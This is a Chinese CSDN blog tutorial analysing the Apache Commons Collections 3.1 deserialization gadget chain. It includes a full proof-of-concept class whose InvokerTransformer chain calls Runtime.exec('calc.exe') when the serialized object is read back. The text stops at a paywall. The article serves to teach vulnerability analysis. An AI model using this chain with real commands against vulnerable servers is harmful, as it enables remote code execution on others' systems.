Java 反序列化分析从入门到放弃(二)

最新推荐文章于 2022-11-13 08:35:00 发布
最新推荐文章于 2022-11-13 08:35:00 发布
阅读量359 收藏 1
点赞数
分类专栏: 反序列化 Java 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_38963246/article/details/115117404
版权

CommonsCollections3.1 反序列化利用链分析

基础知识参考: Java 反序列化分析从入门到放弃(一)

一、环境配置

           本次分析的是CommonsCollections3.1的反序列化利用链,Java环境为jdk1.8.0_261 ,使用的IDE是eclipse

           需要下载一些依赖环境:CommonsCollections3.1的源码和zip文件。
CommonsCollections3.1 下载地址:
https://commons.apache.org/proper/commons-collections/download_collections.cgi

1、 配置运行环境

        新建Java项目,注意选择运行环境版本,使用jdk1.7.0_80
在这里插入图片描述

之后新建类Serialize_Test_Poc

import org.apache.commons.collections.*;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;


import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.lang.annotation.Retention;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.util.HashMap;
import java.util.Map;

import java.io.*;

public class Serialize_Test_Poc {
   

    public static void main(String[] args) throws Exception {
   
        //此处构建了一个transformers的数组,在其中构建了任意函数执行的核心代码
        Transformer[] transformers = new Transformer[] {
   
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] {
   String.class, Class[].class }, new Object[] {
   "getRuntime", new Class[0] }),
                new InvokerTransformer("invoke", new Class[] {
   Object.class, Object[].class }, new Object[] {
   null, new Object[0] }),
                new InvokerTransformer("exec", new Class[] {
   String.class }, new Object[] {
   "calc.exe"})
        };

        //将transformers数组存入ChaniedTransformer这个继承类
        Transformer transformerChain = new ChainedTransformer(transformers);

        //创建Map并绑定transformerChina
        Map innerMap = new HashMap();
        innerMap.put("value", "test");
        //给予map数据转化链
        Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
        
        
        
		/*
		 * //触发漏洞 Map.Entry onlyElement = (Map.Entry)
		 * outerMap.entrySet().iterator().next();
		 * //outerMap后一串东西,其实就是获取这个map的第一个键值对(value,value);然后转化成Map.Entry形式,
		 * 这是map的键值对数据格式 onlyElement.setValue("foobar");
		 */
        
        //反射机制调用 AnnotationInvocationHandler 类的构造函数
        Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        //返回指定参数类型的所有构造器,包括public的和非public的,当然也包括private的
        Constructor ctor = cl.getDeclaredConstructor(Class.class,Map.class);
        //取消构造函数修饰符限制
        ctor.setAccessible(true);
        //获取实例
        Object instance = ctor.newInstance(Target.class, outerMap);
        
        
        //payload序列化写入文件,模拟网络传输
        FileOutputStream f = new FileOutputStream("payload.bin");
        ObjectOutputStream fout = new ObjectOutputStream(f);
        fout.writeObject(instance);
        
        //服务端读取文件,反序列化,模拟网络传输
        FileInputStream fi = new FileInputStream("payload.bin");
        ObjectInputStream fin = new ObjectInputStream(fi);
        fin.readObject();
        
    }
}

2、 导入依赖包

        选中项目右键配置Build path:
在这里插入图片描述
选择Libraries => Add External JARS =>选择下载的文件=> Apply and Close。
在这里插入图片描述

3、 关联源文件

        在代码调试中要分析源文件,所以要关联源文件。使用Java Decompiler反编译jre1.7.0_80\lib\rt.jar,Java Decompiler下载地址:
http://java-decompiler.github.io/
在这里插入图片描述
把导出的zip文件丢在jre的目录下即可。
在这里插入图片描述

选中项目,右键 => Run As => Run Configurations
在这里插入图片描述

选择Alternate JRE=>点击 => Installed JREs
在这里插入图片描述

如果没有配置就点击Add添加自己的jdk路径,添加之后选中并点击Edit
在这里插入图片描述

选择rt.jar => Source Attachment => External location => External File
在这里插入图片描述

二、代码分析

1、InvokerTransformer

       CC3.1jar包中,InvokerTransformer的transform方法会通过反射机制去调用任意函数。
类所在路径:

commons-collections-3.1.jar!/org/apache/commons/collections/functors/InvokerTransformer.class

查看源码:
在这里插入图片描述
其实类InvokerTransformer是实现了Transformer接口,但由于接口回调的特性,执行的方法还是InvokerTransformertransform方法。

Transformer 接口如下图所示:在这里插入图片描述
InvokerTransformer实现Transformer接口如下图所示:
在这里插入图片描述

可见通过多次调用InvokerTransformertransform方法即可实现调用一条命令执行链。

InvokerTransformerDemo 类为例:

import org.apache.commons.collections.functors.InvokerTransformer;

public class InvokerTransformerDemo {
   
	public static void main(String[] args) throws Exception {
   
		
		//利用Java反射获取类对象
		Class runtimeClass = Class.forName("java.lang.Runtime");
		
		//利用InvokerTransformer的transform会通过反射机制去调用任意函数
		//返回 java.lang.Runtime的class对象->m_getMethod,可以类比下一行分析
		//java.lang.Runtime.getMethod("getRuntime") -> 返回 java.lang.Runtime.getRuntime 方法
		//new Class[] 新建一个类数组,值为String.class,Class[].class
		Object m_getMethod = new InvokerTransformer(
				"getMethod", 
				//getMethod()的参数类型是{"getRuntime",null},所以new Class[]的类型为String.class
				new Class[] {
   String.class,Class[].class},
				new Object[] {
   "getRuntime",null}
				).transform(runtimeClass);
		
		//java.lang.Runtime.getRuntime.invoke() -> 返回 java.lang.Runtime.getRuntime() 对象
		Object runtime = new InvokerTransformer(
				"invoke",
				//invoke(对象,参数),所以new Class[] 的类型为Object.class
				new Class[] {
   Object.class,Object[]
最低0.47元/天 解锁文章
大数据学习指南从入门到精通
Lansonli(蓝深李)的博客
05-21 2万+
利用框架的力量,看懂游戏规则,才是入行的前提大多数人不懂,不会,不做,才是你的机会,你得行动,不能畏首畏尾选择才是拉差距关键,风向,比你流的汗水重要一万倍,逆风划船要累死人的为什么选择学习大数据开发,不选择Java开发?借棋弈做比喻,智商高的不要选择五子琪,要选择围棋,它能长久地吸引你。不都是在棋盘上一颗黑子一颗白子地下吗?因为围棋更复杂,能够掌握如此复杂的技艺、产生稳定输出的棋手、让我们更佩服。选择学习大数据开发也如此,能让你的职业生涯走得更远,少走弯路。
Java入门到天黑|02】SE入门Java基础
孙叫兽的博客
04-16 3513
Java基础
Java 反序列化分析入门放弃(一)
痴人说梦梦中人
03-23 532
基础知识学习:        学习反序列化之前需要了解一些储备知识,我大致分了几个块。 序列化和反序列化 Java 方法重写 Java 继承与向上转型 Java 接⼝与回调 Java 反射机制 Map的entrySet()使用 CommonsCollections 参考链接 一、序列化和反序列化        Java 序列化是指把 Java 对象转换为字节序列的
SpringMVC的jar包之 commons-collections-3.1.jar的官方下载(免费)
junshiqingmo的博客
09-11 3168
SpringMVC的jar包之 commons-collections-3.1.jar的官方下载(免费) 官方网站: http://mvnrepository.com/artifact/commons-collections/commons-collections/3.1 1.点击上面的链接进入官方网站; 2.按照下面的步骤: 3.这是3.1的下载方式,其它类似; 4.经过...
Java反序列化基础
公众号shadow sock7
02-13 298
参考: https://xz.aliyun.com/t/4711 commons-collections-3.1反序列化漏洞Demo 依赖commons-collections-3.1 下载地址: https://repo1.maven.org/maven2/commons-collections/commons-collections/3.1/commons-collections-3.1.ja...
commons-collections-3.1.jar.zip
02-02
java jar包,亲测试可用 安全,可以对其进行数字签名,只让能够识别数字签名的用户使用里面的东西。 加快下载速度; 压缩,使文件变小,与ZIP压缩机制完全相同。 包封装。能够让JAR包里面的文件依赖于统一版本的类文件。 可移植性,能够在各种平台上直接使用。 把一个JAR文件添加到系统的classpath环境变量之后,java通常会把这个JAR文件当做一个路径来处理。通常使用jar命令来压缩,可以把一个或多个路径全部压缩成一个JAR文件。
java常用jar包详解
顺其自然~专栏
11-15 3万+
1、dt.jar SUN对于dt.jar的定义:Also includesdt.jar, the DesignTime archive of BeanInfo files that tell interactive development environments (IDE's) how to display the Java components and how to let the dev...
Java Web从入门到实战
m0_67393342的博客
07-30 2713
操作系统:管理计算机硬件与软件资源的计算机程序,同时也是计算机系统的内核与基石。主流操作系统Linux发展历程Linux特点Linux与其它操作系统的区别Linux发行商和常见发行版先安装虚拟机,再安装CentosVmware简介Vmware下载:https://www.vmware.com/cn.htmlCentOS镜像下载:https://www.centos.org/download/ 高速下载地址简介:SecureCRT是一款支持SSH(SSH1和SSH2)的终端仿真程序,简单地说是Windows下
学习笔记-java代码审计-反序列化
人饭子的博客
11-13 1001
Java代码审计-反序列化 0x00 漏洞挖掘 业务代码 简单来说,找readObject/readUnshared就好了 protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { String baseStr...
Java代码审计:反序列化CommonsCollections1详解
god_Zeo的安全博客
08-27 1686
0x01 漏洞介绍 Apache Commons Collections是一个第三方的基础类库,提供了很多强有力的数据结构类型并且实现了各种集合工具类,可以说是apache开源项目的重要组件。 CommonsCollection在java反序列化的源流中已经存在5年 今天介绍的CommonsCollections1反序列化的第一种RCE序列化链 CommonsCollections1反序列化漏洞点仍然是commons-collections-3.1版本 0x02 实验环境 maven的pom导入依赖
commons-collections-3.1.zip jar包
02-01
java jar包,亲测试可用 安全,可以对其进行数字签名,只让能够识别数字签名的用户使用里面的东西。 加快下载速度; 压缩,使文件变小,与ZIP压缩机制完全相同。 包封装。能够让JAR包里面的文件依赖于统一版本的类文件。 可移植性,能够在各种平台上直接使用。 把一个JAR文件添加到系统的classpath环境变量之后,java通常会把这个JAR文件当做一个路径来处理。通常使用jar命令来压缩,可以把一个或多个路径全部压缩成一个JAR文件。
json用到的jar包(commons-beanutils.jar、commons-collections-3.1.jar等)
06-20
json相关jar包(不使用springmvc开发时)。其中包含(commons-beanutils.jar、commons-collections-3.1.jar、commons-lang-2.6.jar、commons-logging.jar、ezmorph-1.0.6.jar、json-lib-2.2.3-jdk15.jar)
commons-collections-3.1.jar;commons-dbcp-1.2.1.jar;commons-pool-1.2.jar
04-28
tomcat 连接池 mssql 驱动包
jdbc用到的jar包(commons-collections-3.1.jar、commons-dbcp-1.2.2.jar、commons-pool.jar)
06-20
使用jdbc时用到的jar包,其中包含(commons-collections-3.1.jar、commons-dbcp-1.2.2.jar、commons-pool.jar)
ssh整合包解释
七两雨
05-29 723
commons commons-digester-2.0.jar      基于规则的XML文档解析,主要用于XML到Java对象的映射 commons-io-2.0.1.jar        struts2信息传输 commons-fileupload-1.2.2.jar       web文件上传 commons-collections-3.1.jar     包含一些Apache开发
6-java安全——java反序列化漏洞利用链
网络安全
07-01 4591
本篇将学习java反序列化漏洞原理,然后结合一个apache commons-collections组件反序列化漏洞来学习如何构造利用链。 我们知道序列化操作主要是由ObjectOutputStream类的 writeObject()方法来完成,反序列化操作主要是由ObjectInputStream类的readObject()方法来完成。当可序列化对象重写了readObject方法后,在反序列化时一般会调用序列化对象的readObject方法。 在Student类中重写ObjectInputSt
解决org.apache.commons.collections找不到问题
热门推荐
sanqima的专栏
12-18 5万+
出现The import org.apache.commons.collections cannot be resolved问题,是因为collections-generic-4.0.1.jar没有引入,同时要注意import的写法。 解决方法:   1.引入collections-generic-4.0.1.jar   import org.apache.commons.collections15.*;
Java反序列化漏洞学习---Apache Commons Collections
gental_z的博客
10-11 1108
Java反序列化漏洞学习—Apache Commons Collections 第一次接触Java安全~~~~ Apache Commons Collections是Apache Commons的组件,该漏洞的问题主要出现在org.apache.commons.collections.Transformer接口上。在Apache commons.collections中有一个InvokerTransformer实现了Transformer接口,主要作用为调用Java的反射机制来调用任意函数。 影响组件版本:
Apache Commons
tengmuxin的专栏
08-30 1009
Apache Commons包含了很多开源的工具,用于解决平时编程经常会遇到的问题,减少重复劳动。项目地址http://commons.apache.org/ Commons BeanUtils 提供对Java反射和自省API的包装。 依赖包:Commons Codec、Commons Logging Commons Codec 是编码和解码组件,提供常用的编码和解码
Java语言入门:从简单应用程序到核心概念解析
9. Java输入/输出:文件I/O、流和对象序列化。 10. 网络编程:利用Java进行TCP/IP通信和HTTP协议处理。 参考资料提供了几本经典的Java教材和在线教程,帮助学习者深入理解和掌握Java编程技术。 这个Java课件合集是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值